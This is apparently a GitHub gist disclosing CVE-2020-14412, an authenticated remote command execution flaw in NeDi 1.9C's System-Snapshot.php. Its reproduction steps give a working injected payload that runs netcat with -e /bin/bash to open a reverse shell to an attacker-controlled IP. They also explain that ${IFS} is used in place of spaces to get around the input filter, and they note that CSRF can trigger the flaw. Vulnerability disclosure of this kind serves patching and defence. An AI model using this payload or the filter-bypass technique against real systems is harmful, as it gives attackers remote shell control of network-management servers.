Skip to content

Instantly share code, notes, and snippets.

@farid007

farid007/NeDI 1.9C RCE

Last active Jun 28, 2020
Embed
What would you like to do?
NeDi 1.9C Authenticated RCE (CVE-2020-14412)
CVE-2020-14412
NeDi 1.9C is vulnerable to Remote Command Execution. System-Snapshot.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a psw parameter.
(This can also be exploited via CSRF.)
Steps To Reproduce-:
> Login with the credential.
> Go to https://ip/System-Snapshot.php.
> Insert any data in the first field then intercept the request.
> Insert this command (;nc${IFS}192.168.56.1${IFS}433${IFS}-e${IFS}/bin/bash;) and start listener on port
> Note: in order to bypass regex, we need to use ${IFS} this is used for space in linux.
> You will be greeted with a shell.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.